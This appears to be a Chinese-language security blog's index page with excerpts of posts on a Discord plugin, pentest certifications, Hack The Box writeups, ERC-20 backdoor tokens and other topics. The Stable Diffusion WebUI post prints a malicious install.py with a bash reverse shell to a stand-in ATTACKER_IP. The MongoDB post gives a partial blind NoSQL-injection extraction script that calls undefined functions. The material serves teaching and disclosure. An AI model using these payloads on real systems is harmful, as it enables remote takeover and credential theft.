Steven Meow's Blog 🐱

BabelChat 基於 AI 的 Discord 翻譯軟體

Sat, 07 Mar 2026 21:00:00 +0800

TL;DR：用 Claude Code Vibe Coding 了一個 Discord 翻譯插件，基於 Vencord，支援任何 OpenAI 相容 API，可以一鍵翻譯整串對話、自動翻譯新訊息、打字時先翻譯再送出。免費、開源、附一鍵安裝腳本。GitHub

現在無論資安、WEB 3 相關的社群都流行在 Discord 上開啟相關的 Server。因此我的 Discord 上常常充斥著多種不同的語言，每次遇到看不懂或懶得看的時候，我不是打開 Google 翻譯 / DeepL 就是打開 ChatGPT / Gemini，每天重複很多次，多到乾脆懶得看ㄌ。

網路上現在當然也有一些 Solution，例如基於 Better Discord 的 Translator Plugin 等，不過這些翻譯仍然是基於 Google 翻譯等 API，而且使用操作起來並沒有想像中直覺，沒辦法大規模的翻譯一整串的聊天訊息。或是直接安裝翻譯 Bot，但這又會驚動其他使用者，畢竟對我來說，潛水偷看才是最常發生的事 XD。

首先我們需要知道一下 Discord 預設其實是不允許安裝 Extension 的，社群為了解決這個問題，最簡單的方法當然就是使用瀏覽器，瀏覽器的翻譯外掛就有非常多的選擇，例如我最常用的沈浸式翻譯 (Immersive Translate)，不過非原生用起來總是沒有很舒服，所以我希望使用盡可能原生的方法在 Discord 中解決這個問題。另外一個我的需求是希望可以使用 AI 輔助翻譯，出現原文跟中文的對照，實現類似沈浸式翻譯的體驗。

Vencord

因此如果想要對原生的 Discord 動手腳的話，最常使用的工具叫做 Vencord，這邊需要知道 Discord 本質上是一個 Electron 的 APP，也就是包了一個 Chromium 在裡面跑 React，所以只要有辦法 Inject JS 的話就可以直接增加功能。不過直接改 Discord 的程式碼是一件很痛苦的事情，它經過了一系列 webpack 的打包壓縮等，每一次更新都需要重新逆向一次。

部落格搬新家ㄌ！

Sun, 01 Mar 2026 00:17:00 +0800

睽違了 3 年多，終於把我的舊部落格給搬到新家了 XD。

先來分享一下為什麼會突然想要更新部落格以及搬家，事實上我的部落格已經荒廢了超久丟著沒維護，總覺得在 AI 時代，好像分享一些基礎的東西已經沒有太大的意義了，就一直沒有太想寫文章。不過因為最近自己在做一些 Wordpress 相關的研究，一不小心就挖到了一堆的 CVE 漏洞（應該以後有機會會再拿出來分享），這些漏洞讓我覺得荒廢多年的 Wordpress 一直擺著其實是一件超可怕的事情。再加上不明原因導致，我的舊 Blog 一直會出現 SSL 故障的問題。因此想說搬家到 hugo 純靜態是一個一勞永逸的方法。

因為原本的 Blog 是 Wordpress 6.9 搭配 PHP 7 時代的產物，現在搬家也是一件比較麻煩的事情，所以就一直沒有動手，直到現在有了方便的 Claude Code 可以自己幫我處理這些問題，才讓我毅然決然（？）決定來搬家。不過搬家過程確實還是經歷了不少的風風雨雨。

一開始我打算使用 wp2hugo 結果在轉換的過程中會直接的 crash。後來就自己命令 Claude 幫我寫了一個 Python的腳本來進行轉換。接下來我發現在 WardPress上面的 XML 的匯出其實也是不完整的。原本的 158 篇文章只能匯出 88 篇，就算透過 SSH 進去使用 wp-cli 也是一樣的結果，因此最後的解法是 SSH 進入 Docker 使用 PHP + MySQLi 直接讀取資料庫才解決完畢，感嘆 Claude 讚嘆 Claude，這種事情如果在古時候應該就需要花上大半天的時間吧 XD。

總之現在搬完了 Blog，重新設定好了該設定的內容，也許我會再開始寫一陣子的 Blog 吧（？），分享一些近期 Vibe Coding 出來的小玩具。至少現在放著也比較不用擔心維護及管理 Server 的問題。如果心情好可能也會補一些過去三年沒有傳的內容，一切就看心情ㄌ嘻嘻。

手把手教學的 Active Directory 資安證照：CRTP

Mon, 25 Sep 2023 17:43:33 +0800

我在今年七月時，報名了 CRTP 的證照，CRTP 的課程，全名 Attacking & Defending Active Directory Lab。它的特色主要在於，所有題目都是 Windows 最新版本 Windows Server 2022 且 Windows Defender 全開的機器，Lab 以及考試的內容都圍繞在 Windows AD 之中。

它的 Lab 宗旨主要是對於 Windows 中，無法透過 Patch 修復的一些 Misconfiguration，相較於 OSCP 常見的打 CVE，方向不太一樣。另外就是，這張證照完全不需要使用到任何的 Linux 機器，例如 Kali。它的起步點預設於我們已經拿到一台 Domain Joined 的 Windows，並以那台 Windows 電腦作為起跑點，進行橫向移動，拿到 Domain Admin。

其實這張證照我在今年初就有打算想要報，不過後來看到了一些相關的通知，說 Pentester Academy 在 2023 年初將不再提供 CRTP 的證照。好在後來這張證照改由 Altered Security 繼續推出，看起來像是這堂課的講師 Nikhil 自己出來自立門戶，開了一間公司。

在今年七月初，當完了研發替代役的兵之後，距離公司的下一個大 Project 開始之間，有差不多一個禮拜的空擋，因此我就花了一週的時間把 Lab 全部刷完了 XD。

報名

CRTP 現在的報名頁面是以下網址：https://www.alteredsecurity.com/adlab

我覺得網站非常簡陋，看起來也很像釣魚網站，目前它有三種不同的方案，分別是 30 天 249 鎂；60天 379 鎂以及 90 天 499 鎂。

Stable Diffusion WebUI RCE Vulnerability

Sun, 23 Apr 2023 19:50:08 +0800

目前最有名的 Stable Diffusion GUI 程式是由 AUTOMATIC1111 開發的
stable-diffusion-webui ，它強大且多功能的介面，吸引了非常多人的使用。

Stable Diffusion Web UI 支援透過 Extension 功能安裝第三方的套件，使用者僅需貼上對應的 GitHub Repository 即可安裝對應的套件。

透過這種方式安裝套件非常方便，但也有嚴重的安全隱患。這些套件都是透過 Python 撰寫而成，因此，駭客也可以自行準備一個惡意的腳本，並透過該 UI 載入，即可達成遠端指令執行 (RCE)。

Stable Diffusion Web UI 的套件格式為，一個 install.py 的腳本進行安裝相關操作，而主要的腳本則放在 scripts 資料夾中。而初次引入腳本的瞬間，系統會自動執行 install.py 的程式碼。因此，如果攻擊者準備好一個包含惡意腳本的 Repository，並引入，即可控制遠端的系統。

舉例來說，我們可以建立一個 Github Repository，並單純只放入 install.py，裡面寫入一個 Reverse Shell 的腳本。

import os

os.system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/8787 0>&1' &")

並操作 Stable Diffusion Web UI 進行引入的動作，當按下引入後，攻擊者的 IP 即可收到一個 Reverse Shell，也就代表我們已經順利的駭入這台電腦或伺服器了！

Demo: https://www.youtube.com/watch?v=yyjeMs1R8Ew

其實，這套 Web UI 預設是開在 127.0.0.1 僅供本地使用，不過許多人為了遠端存取，或是多人共用，因此將其直接開在廣域網路上。可怕的事情是，只要對整個網際網路開啟了 Web UI，駭客就可以輕易地奪走使用者的電腦或是伺服器！

TL;DW (An AI Support Video Summarizer)

Tue, 28 Feb 2023 13:36:16 +0800

Too Long; Don’t Watch

二二八連假，我整理了一下手邊囤積的各種，還沒時間~~或是懶得看~~的教學影片。包含了各大 Conference，或是路邊撿來的一些課程內容。點開這些影片，雖然內容跟標題都非常吸引人，不過常常出現奇怪的印度口音造成理解困難 QQ。而總計數百、數千小時的影片量應該是不可能在有生之年有辦法看完的，再加上許多影片並沒有提供原始的 PPT 檔案 QQ。

因此，我寫了一個腳本來透過 GPT 3 解決這個問題！透過 GPT3 的 AI 引擎來自動地幫每一頁的簡報進行 Summarize。

Repo 載點：https://github.com/stevenyu113228/TL-DW

在腳本中，首先我透過 ffmpeg 將影片截圖成每秒一張的照片，接下來使用 UQI (Universal image Quality Index) 區分出不同的圖片，並將圖片透過 Tesseract 進行 OCR 轉換成文字；同一時間，把影片的聲音軌給分離出來，並依照截圖的時間點進行切割，即可取得每一頁投影片所對應的語音內容，再把語音內容給送入 Google 的語音轉文字服務，取得每一頁講者的語音。

有了每一頁的 OCR 結果以及講者的語音轉文字，接下來就可以由 AI 出面了！我使用了目前最夯的 OpenAI GPT-3 text-davinci-003 模型，並使用以下咒語產出 Summary。

以下是一段課堂上投影片的語音轉文字，以及其對應講義的 OCR 資料，請忽視 OCR 的錯誤及簡報 header/footer。並使用繁體中文統整該頁面之內容，專有名詞部分請盡量保留使用英文\n\n語音轉文字：```\n{voice}\n```\n\n投影片 OCR：```{ocr}```\n\n統整結果：

最終，再把結果透過 Python 的 docx 輸出成完整報告，這樣下來只需要不到原始影片三分之一的時間，就可以讀完整份影片的內容，而如果逐字稿跟 AI 對於某段的總結有點奇怪時，也可以直接從報告上取得該頁面的時間，自己切回去影片重新查看！

不過 OpenAI 的 API 是需要付費的，但它有 18 美元的試用額度，我自己實驗下來，一個 30 分鐘的教學影片約需要花費 0.3~0.7 美元，我認為是非常划算 & 值得的！

去中心化的區塊鏈虛擬貨幣是唬爛的 - ERC-20 後門實戰

Thu, 05 Jan 2023 14:08:15 +0800

前一篇文中，我們使用了 Solidity 實作 ERC 20 代幣，當時我們提到了區塊鏈的虛擬貨幣，其實就只是在 EVM 中的一個 map (類似 Python 的 Dictionary)，裡面儲存了位址以及金額。而 ERC 20 標準，只需要符合指定的 Interface，講白話文就是，僅需要 Implement 指定的幾個 Function，就能發行一個新的虛擬貨幣。

然而，這會有兩個明顯的問題，首先，我們只需要依照標準定義 function 的名稱、輸入、輸出就可以符合 ERC 20 的標準，這邊並沒有限制任何的 function 內容需要怎麼實作，這意味著我們可以自己幫 Function 加料，例如在 Function 中埋藏一些後門。另外，我們也可以在同一個 Contract 中，額外實作標準以外的其他 Function 來達成我們希望的功能，做這兩件事情，都依然是一個合法、符合 ERC 20 標準的代幣。

為了避免重造輪子，事實上我們可以直接 import 由 OpenZeppelin 提供的 Library 來進行繼承或是修改，OpenZeppelin 也提供了很多擴充功能可以使用。

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Burnable.sol";

舉例來說，我們想要發行一個後門幣 (Back Door Coin, BDC) 的話，僅需在合約的 Constructor 定義我們初始需要鑄造多少顆幣，預設的 decimals 是 18，也就是真正的貨幣金額會是 Balance 值 *10^-18，以避免浮點誤差。

一起來用 ERC-20 發行垃圾幣吧！

Mon, 26 Dec 2022 17:33:17 +0800

只要建立了 ERC-20 標準的合約，就可以自動相容各種 ERC-20 代幣的軟硬體錢包，交易所等，事實上，只需要寫約 100 行的 Code 就能自己發行代幣，也可以很輕易的在這些合約 Code 內留下後門來做壞壞ㄉ事。

Interface

為了能夠把常見的介面給定義清楚， Solidity 有 interface 的功能。所有的函式必須是 External，即使最後宣告時使用 public。

一個 ERC20 的介面必須有 2 個事件以及 6 個函式

interface IERC20 {
 event Transfer(address indexed from, address indexed to, uint256 value);
 event Approval(address indexed owner, address indexed spender, uint256 value);

 function totalSupply() external view returns (uint256);

 function balanceOf(address account) external view returns (uint256);
 function transfer(address to, uint256 amount) external returns (bool);

 function approve(address spender, uint256 amount) external returns (bool);
 function allowance(address owner, address spender) external view returns (uint256);
 function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

totalSupply

可以回傳代幣的總發行量，通常會使用狀態變數 _uint256 _totalSupply 來儲存。

既不智能，又不是合約的智能合約 - Solidity

Mon, 26 Dec 2022 13:04:27 +0800

智能合約並不智能，也不是合約，它只是可以執行在 EVM (Ethereum Virtual Machine) 中的一段 ByteCode 而已。之所以叫這個名字應該只是比較潮ㄅ，而且我覺得「智能」還有一點支語的味道，但在台灣也很少聽到「智慧型合約」這種說法。

合約不會自動執行，也不會自動結算跟驗證之類的事情，如果需要執行合約內的 Function，需要呼叫指定的 Transaction。

Account

在 Ethereum 底下，有兩種的 Account，分別是具有 Contract Code 的 Contract Account 以及沒有 Contract 的 EOA (External Owned Account)。創建 Contract 需要使用到 EOA，且 Contract Account 比起 EOA 增加了 Storage hash 以及 Code hash 的欄位。

在 EOA 底下，總共有三種 Transaction

轉 Ether
部署 Contract
呼叫 Contract 裡面的特定 Function

在進行轉 Ether 的 Transaction 時，總共會有 4 個欄位：From, To, Value 以及 Data，其中，Data 為備註欄位，可以填入任意值。

而透過 EOA 執行部屬 Contract 時，在做的事情跟轉 Ether 一樣，同樣需要填入上述的 4 個欄位。只是 To 需要留空，只要 To 留空就代表該筆 Transaction 是 Create New Contract。而 Data 欄位則輸入填入 Byte Code， Value 則可以塞一些 Ether 進入合約內。

EC-Council is Sucks

Fri, 23 Dec 2022 21:20:32 +0800

(中文版請點這邊 Chinese Here)

//This article is translate by ChatGPT!!

I really think that EC-Council is a very poor company. Although I have not paid them any money, their actions are truly unappealing = =.

In May of this year, I participated in the free CPENT course offered by Taiwan UUU and successfully completed the CPENT certification after the course ended within one week. Simply put, this certificate claims to be able to rival the OSCP, but in fact, it is less than 1/5 of the OSCP. Over 85% of the exam is brute force cracking.

EC-Council 是一間爛公司

Fri, 23 Dec 2022 18:53:05 +0800

(English Here)

真的覺得 EC-Council 是一間非常爛的公司，雖然我沒有付給它任何的一毛錢，不過他們公司的所作所為真的令人不敢恭維 = =。

在今年五月底時，我參加台灣恆毅提供的 OSCP 免費報名 CPENT 課程，並順利在課程結束後一個禮拜的時間考完了 CPENT 證照。簡單來說，這張證照號稱可以跟 OSCP 匹敵，但事實上連 OSCP 的 1/5 都不到，整個考試有超過 85% 都在暴力破解。

我覺得這張證照惡劣的地方在於，雖然考試有提供暴力破解的字典檔，但是在課堂上，講師明示暗示的提醒大家需要手動調整暴力破解字典檔的順序，不然會爆到天荒地老。這完全不是一個健康的考試方法吧？我自己上課有聽了一下，因此手動調整了爆破的順序，所有的暴力破解都在 3 分鐘內爆完；另外，我也有其他朋友上課沒有注意到這個部分，考試單純暴力破解就浪費了 7 個小時，這真的非常糟糕。

自從我上次發了「深度解析 CPENT 考試心得、以及與 OSCP 的比較」這篇文後，甚至 UUU 的老師當眾在課堂上嘴我ㄟ，阿不就還好課堂底下也都有我認識的人，笑死。關於那張證照的內幕，請回去看原始文章，今天我要分享的內容不是 EC 的垃圾考試部分，而是他們行政處理也非常的糟糕。

CPENT 證照分數取得超過 90%，可以額外獲得一張 LPT 證照，我於 2022 年 6 月 2 號完成了這張證照考試，提交報告後，於隔天 6 月 3 號收到了以下 Email。

簡單來說就是恭喜我證照通過了，它來跟我要我的地址，準備寄送證照，到這邊為止一切都很合理。我也於收到這封信的兩個小時後回信了相關的資料。

在考完試的 6 天後，也就是 6 月 9 號我收到了回信，信中提醒我，我的實體證照將於 3~4 週收到！ OK，四周的話，姑且當作是一個月，也就是照理來說，7月9日左右，我應該就會收到證照了……吧？

到了 6 月 22 日，也就是距離我考到證照後約三週的時間，我又收到了一次 EC-Council 的 Email，來跟我確認我的家裡地址。

利用 OpenAI GPT-3 寫一個 Telegram 聊天機器人 (Cloudflare Tunnel & GCP AppEngine)

Sun, 04 Dec 2022 21:54:53 +0800

最近 ChatGPT 很紅，想說可以試著把 OpenAI 的 API 給接上 Telegram 的群組來玩玩看，順便記錄一下 GCP 的 AppEngine Deploy 方法！

程式碼我放在：https://github.com/stevenyu113228/OpenAI-GPT-3-Telegram-Chatbot

效果

OpenAI

先到 https://beta.openai.com/account/api-keys

申請一組 API Token

在 Playground 上面隨意玩一下，複製他的 Example 來微調

import os
import openai

openai.api_key = os.getenv("OPENAI_API_KEY")

start_sequence = "\nA:"
restart_sequence = "\n\nQ: "

response = openai.Completion.create(
 model="text-davinci-003",
 prompt="Q: ",
 temperature=0,
 max_tokens=100,
 top_p=1,
 frequency_penalty=0,
 presence_penalty=0,
 stop=["\n"]
)

Telegram API

接下來到 Telegram 的 BotFather 來新增 Bot

如果我說 OSWE 很好考會不會有人想打我

Sun, 27 Nov 2022 21:29:27 +0800

前陣子報名了 OSWE / AWAE 的課程，在空閒的時間學習，終於在一個半月的時間內考到了 OSWE 證照，趁還沒有忘記之前來寫一下心得文。

前言

我覺得要提到資安證照，不得不提到 Paul Jerimy Media 上的 Security Certification Roadmap。

以目前 2022 年 8 月最新版，該列表上的資安證照總共有 460 張，目前我持有的基本上都偏向右邊的 Security Operations 部分。包含了本次的 OSWE、OSCP 以及不予置評的 LPT 及 CPENT，ㄏㄏ。

正常來說在這張表上，越上面的代表專業程度越高，也越難。但有許多證照雖然在同樣的領域，因為考試方向不同，如大多數都是選擇題或暴力破解之類的 (我就不說是哪張了 ……)，所以我認為難度也僅供參考，不建議拿來做直接的比較。

目前以紅隊、滲透檢測相關的入門證照，大家最推的通常都是 OSCP， OSCP 在 Offensive Security 中，課程代號為 PEN-200，屬於 200 系列的課程。 OSWE 則是 WEB-300，屬於更高階的課，以同一間公司而言，理論上也會更困難一點？

我個人的背景是，去年年底取得 OSCP 證照；而大學及研究所時期都有玩過一些 CTF，雖然 CTF 的各領域都有基本的涉略，但最熟悉的方向是以 Web 網頁安全為主。

AWAE 課程內容

這邊由於課程規定的部分，我不方便說明太多，不過可以依照官網有提供的內容來進行介紹。

Cross-Origin Resource Sharing (CORS) with CSRF and RCE
JavaScript Prototype Pollution
Advanced Server Side Request Forgery
Web security tools and methodologies
Source code analysis
Persistent cross-site scripting
Session hijacking
.NET deserialization
Remote code execution
Blind SQL injections
Data exfiltration
Bypassing file upload restrictions and file extension filters
PHP type juggling with loose comparisons
PostgreSQL Extension and User Defined Functions
Bypassing REGEX restrictions
Magic hashes
Bypassing character restrictions
UDF reverse shells
PostgreSQL large objects
DOM-based cross site scripting (black box)
Server side template injection
Weak random token generation
XML external entity injection
RCE via database functions
OS command injection via WebSockets (black box)

其實從這邊的項目可以看出來，對於一個常打 CTF 的 Web 🐱 而言，這些問題應該都不陌生，而且我個人認為都偏比較老的洞，並沒有那麼現代 CTF 那些噁心的東西，當然想要用各種噁心的手法，如遇到 LFI 使用 Session Upload Progress 來解應該還是可行。

MongoDB noSQLInjection with Binary Search

Tue, 15 Nov 2022 14:35:47 +0800

MongoDB 上面的 Injection 通常都可以直接使用 [$ne] 來做萬用解，但如果我們的目標不只是登入，而是想要 query 到指定目標的話，參考 HackTricks 可以看出。在 Blind 的情境底下，可以透過 regex 的方法來進行解答。

不過 HackTricks 或是 PayloadsAllTheThings 中，使用的方法通常都是直接對 strings 進行爆破。

這會出現耗時，以及遇到 Regex 保留字時的問題。因此，我透過 regex 的 unicode 功能，寫了一款類似於傳統 SQL injection 中，透過 Binary Search 的方法來取得密碼，廢話不多說，直接上 Code。使用上來看，只需要變更 query 函數中的條件，即可。

import requests
import urllib.parse

def query(q):
 res = requests.get(r"http://127.0.0.1:8791/?user=admin&pass[$regex]=" + q)
 if "Success" in res.text:
 return True
 else:
 return False

def binary_search(left, right, query_s, query_f, v=1):
 while right - left > 3: # 4:
 guess = int(left+(right-left)/2)

 old_left = left
 left = guess
 command = urllib.parse.quote(r"^.{%s}[\x{%s}-\x{%s}].{%s}" % (index, f"{hex(int(left))[2:]:0>4}", f"{hex(int(right))[2:]:0>4}", length-index-1))
 if query(command):
 left = guess
 else:
 right = guess
 left = old_left
 print(f"{left} ~ {right}" , end="\r")

 for i in range(left,right+1):
 command = urllib.parse.quote(r"^.{%s}[\x{%s}].{%s}" % (index, f"{hex(int(i))[2:]:0>4}", length-index-1))
 # print(command)
 if query(command):
 print(f"[!] Answer: {i} ({chr(i)})")
 return i

length = get_len()
print(f"String Length = {length}")

r = []
for i in range(length):
 r.append(chr(binary_search_content(index=i,length=length)))

print(''.join(r))

利用 Home Assistant + ESP32 透過 Siri 開門

Mon, 17 Oct 2022 18:10:33 +0800

家裡的一個鐵捲門遙控器按鈕接觸不良，所以我買了一個新的，而舊的就可以直接拆下來玩了！手邊剛好有一套 4 路的繼電器模組，因此我就做了一點點改裝，達成透過手機遙控鐵門的開關！

硬體

硬體部份其實滿簡單的，開發版我採用了 ESP32S ，多了一個 S 最大的優點是，他的 GPIO 輸出為 5V，使用起來會比普通 ESP32 的 3.3V 方便很多。

把遙控器拆開後，透過電表量一下開關的接點，並直接把線焊出來接上繼電器即可，這邊沒有太大的技術難度。

MQTT Server

ESP32 透過接收 MQTT 是最簡單的方法，我直接把 MQTT Server 架在我的 GCP 上，使用 Eclipse Mosquitto 的 Docker Compose

docker-compose.yml 由於我用不到 9001 Port，所以就將它著解掉

version: "3"

services:
 mosquitto:
 image: eclipse-mosquitto
 volumes:
 - ./:/mosquitto/:rw
 ports:
 - 1883:1883
# - 9001:9001

config/mosquitto.conf 則開啟了 password_file 的功能

persistence true
persistence_location /mosquitto/data/
log_dest file /mosquitto/log/mosquitto.log

listener 1883
socket_domain ipv4
## Authentication ##
# allow_anonymous false
password_file /mosquitto/config/password.txt

接下來只需要透過 README.md 上面的方式設定帳密即可

Arkham (Hack The Box Writeup)

Sat, 15 Oct 2022 23:03:21 +0800

URL : https://app.hackthebox.com/machines/179

先講結論，這是我最近打過 HTB 最硬的一題 …… ，這絕對不是 Medium 的機器，他難度絕對絕對有 Hard。我覺得這一題對於初學者，甚至是剛拿到 OSCP 的人應該都會覺得打得很痛苦 QWQ

這一題題目包含的知識點：

LUKS 解密
Tomcat Config 解析
HMAC 簽章
DES 加解密
Java Viewstate 反序列化
Bypass Windows Defender
Microsoft Outlook email folder (ost) 解析
Base64 圖片還原
Invoke-command 切換使用者
Bypass CLM
CMSTP UAC Bypass

SMB

有開 SMB

所以先匿名登上去

~/HTB/Arkham/new ᐅ smbclient.py 10.129.106.199
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

Type help for list of commands
# login meow
Password:
[*] GUEST Session Granted

發現可以存取 BatShare，裡面有一個 appserver.zip，載下來分析

Docker Run CRLF 小雷

Thu, 13 Oct 2022 20:49:35 +0800

在使用 Docker 時，偶爾會順手帶上 -it (interactive + Allocate a pseudo-TTY)，但我卻因此踩到了一個小雷。

在 alpine 底下，如果加上了 -it ，則 \x0a 會被 Replace 成 \x0d\x0a。所以如果程式的輸出結果是 binary 的話，會因此壞掉 QQ

Json.Net Unserialize (Hack The Box Writeup)

Tue, 11 Oct 2022 17:03:42 +0800

URL : https://app.hackthebox.com/machines/210

這篇文會從黑箱跟白箱兩個角度來試著了解漏洞的成因與 Exploit 方法，省略一些掃描的過程，直接進入滲透步驟。

Black Box

http://10.129.227.191/login.html

是一個登入介面，透過弱密碼 admin / admin 可以進入後台。

觀察登入狀態，可以看出我們是 Post 一個 Json 來進行登入，而登入後會幫我們 Set 一組 Cookie，從 Response 的 Header 可以看出這是一個 IIS 的 Server。

這邊可以猜測說，登入後他應該會把 Json 解析或反序列化到某個物件之中，那我們可以試著看看，如果我們給他一個壞掉的 Json 會發生什麼事，例如下圖給他一個最後缺少 " 的 Json，發現他會噴錯。

at DemoApp.Data.UsuariosData.GetMd5Hash(String input)
 at DemoApp.Data.UsuariosData.Autenticar(String usuario, String password)
 at DemoAppExplanaiton.Controllers.AccountController.Login(Usuario login) in C:\Users\admin\source\repos\DemoAppExplanaiton\DemoAppExplanaiton\Controllers\AccountController.cs:line 24
 at lambda_method(Closure , Object , Object[] )
 at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass6_2.b__2(Object instance, Object[] methodParameters)
 at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ExecuteAsync(HttpControllerContext controllerContext, IDictionary`2 arguments, CancellationToken cancellationToken)
--- End of stack trace from previous location where exception was thrown ---
 at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
 at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
 at System.Web.Http.Controllers.ApiControllerActionInvoker.d__1.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
 at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
 at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
 at System.Web.Http.Controllers.ActionFilterResult.d__5.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
 at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
 at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
 at System.Web.Http.Dispatcher.HttpControllerDispatcher.d__15.MoveNext()"%

然而，這些錯誤並沒有太大的幫助 QQ，接下來我們觀察正確的登入後，他吐出來的餅乾是啥。很直覺可以知道他是一個 base64

Synology NAS HEIC to JPG

Sat, 17 Sep 2022 13:20:44 +0800

iPhone 透過 Synology 的 Photo Station 備份，預設會存 HEIC，除非到 iPhone 相機的設定部分修改成存 JPG。但 HEIC 在 Windows 平台上非常不友善 QQ。

目前貌似沒有看到 S 牌有提供什麼自動轉檔的程式，所以短期可能只能自己處理。

在 Linux 平台上，可以使用 GitHub - shellbro/dockerfile-heif-convert 這套 Docker Image 來處理。

我們觀察這個 Docker 執行的 Script 可以發現，convert-all 其實就是一個 for 迴圈去枚舉 *.heic，不過 iPhone 預設的副檔名是大寫的 *.HEIC，所以我們有兩種解法。 1. 修改現有的附檔名， 2. 修改這個 Script。因為懶得重 Build Docker image 我選擇了 1 的方法。

腳本如下，先 ssh 上 NAS，並 cd 到準備轉檔的資料夾即可

mkdir heic
for a in *.HEIC; do mv -- "$a" "$(pwd)/heic/${a%.HEIC}.heic"; done
sudo docker run --rm -u "$(id -u):$(id -g)" -v $(pwd)/heic:/input -v $(pwd):/output shellbro/heif-convert

如果遇到權限問題，可以自己 hard code uid 跟 gid 即可，可以直接 cat /etc/passwd | 取得 ID

.Net 反序列化攻擊 101

Tue, 13 Sep 2022 13:14:32 +0800

.Net 反序列化一直是一個很熱門的話題，但是因為背後通常都是 Windows，搭建題目不便的原因，導致 CTF 通常很少出現。這邊會用一個很簡單的例子，從 .Net 麻瓜的 Hello World 開始介紹。

因為不想用肥肥 CS，因此使用 csc 進行編譯，需要先把 C:\Windows\Microsoft.NET\Framework\v4.0.30319\ 加到 path

0x1 Hello World

身為一個不熟 C# 的人，凡事從 Hello World 開始

using System;
namespace helloworld{
 class Program{
 static void Main(string[] args){
 Console.WriteLine("Hello World!");
 }
 }
}

編譯

csc /reference:C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll;C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WindowsBase.dll /t:exe /out:hello.exe hello.cs

可以順利的 Hello World!

0x2 Hello Class

C# 中，Class 的寫法是這樣

using System;
namespace hello_class{
 class Program{
 static void Main(string[] args){
 Meow myMeow = new Meow();
 myMeow.MeowName = "Steven";
 myMeow.Meowww();
 }
 }
 public class Meow{
 public string MeowName{
 get;
 set;
 }
 public void Meowww(){
 Console.WriteLine("Hello " + MeowName + " meow meow!");
 }
 }
}

編譯

利用 Lima 在 M1 執行 x86 的 Ubuntu

Sun, 21 Aug 2022 21:34:04 +0800

超簡單就可以直接在 M1 上有類似 WSL 體驗的 x86_64 Ubuntu ， Lima 是透過 QEMU 進行執行的，所以嚴格來說他是一種虛擬機，不太像 WSL 是微軟大大的黑魔法。

安裝

brew install lima

準備一個 Yaml，這邊我是直接抄官方的 Example，並修改，增加第一行的 arch，根據官方文件表示，增加 arch 就能直接指定 CPU 型態

arch: "x86_64"

images:
# Try to use release-yyyyMMdd image if available. Note that release-yyyyMMdd will be removed after several months.
- location: "https://cloud-images.ubuntu.com/releases/22.04/release-20220712/ubuntu-22.04-server-cloudimg-amd64.img"
 arch: "x86_64"
 digest: "sha256:86481acb9dbd62e3e93b49eb19a40c66c8aa07f07eff10af20ddf355a317e29f"
- location: "https://cloud-images.ubuntu.com/releases/22.04/release-20220712/ubuntu-22.04-server-cloudimg-arm64.img"
 arch: "aarch64"
 digest: "sha256:e1ce033239f0038dca5ef09e582762ba0d0dfdedc1d329bc51bb0e9f5057af9d"
# Fallback to the latest release image.
# Hint: run `limactl prune` to invalidate the cache
- location: "https://cloud-images.ubuntu.com/releases/22.04/release/ubuntu-22.04-server-cloudimg-amd64.img"
 arch: "x86_64"
- location: "https://cloud-images.ubuntu.com/releases/22.04/release/ubuntu-22.04-server-cloudimg-arm64.img"
 arch: "aarch64"

mounts:
- location: "~"
- location: "/tmp/lima"
 writable: true

Build 環境

這邊的 ./ubuntu.yaml 就是前面準備的內容，而 –name 則是帶之後要給他的名字

SSH Tunnel (Port Forwarding) 速記法

Thu, 11 Aug 2022 17:43:40 +0800

好像好久沒有更新了，回來刷一下存在感。

最近一直遇到需要打 ssh tunnel 的情境，然而，網路上那些圖解的 SSH Tunnel 對我來說是越看越ㄇㄤ QQ，可能我對於圖像的理解有一點點小障礙吧，以下是我自己對於 SSH Local, Remote 以及 Dynamic Forwarding 的速記法。

首先是一個定則就是 目標:原始IP:原始Port

Local Forwarding

顧名思義， Local 就是要把遠端的東西「打回我們 Local」。

舉例來說，遠端機器有開了一個 3000 Port 在 127.0.0.1，我們希望在我們本機上面把它接出來，接到我們家的 5000 Port，那麼需要這樣下。

ssh -L 5000:127.0.0.1:3000 user@host

-L 是打回我們自己的Host, 127.0.0.1:3000 是遠端的 IP 跟 Port

另外假設，遠端的機器摸得到 192.168.87.8:80 ，而我們機器也希望可以摸到的話，可以輸入以下指令，透過 host 機器把 192.168.87.8:80 轉到我們 Local 的 127.0.0.1:9487。

ssh -L 9487:192.168.87.8:80 user@host

Remote Forwarding

顧名思義， Remote 就是要把我們家的東西「送過去 Remote」。

假設我們在本地開了一個 127.0.0.1:7414 ，而我們希望把這個東西給轉去遠端的機器的 127.0.0.1:9453 上，則可以使用

ssh -R 9453:127.0.0.1:7414 user@host

這邊的 127.0.0.1:7414 是我們機器上的 IP 跟 Port，而 9453 則是遠端機器的 Port，也就是打過去的目標。

深度解析 CPENT 考試心得、以及與 OSCP 的比較

Fri, 10 Jun 2022 20:43:30 +0800

前陣子參加了恆逸的活動，擁有 OSCP 證照者免費上 CPENT 課程，以及考照的活動，很高興的，我順利的考取到了 CPENT 以及 LPT 的證照。先在前面跟恆逸的所有工作人員說聲感謝，也跟 Vicent 老師說聲謝謝。

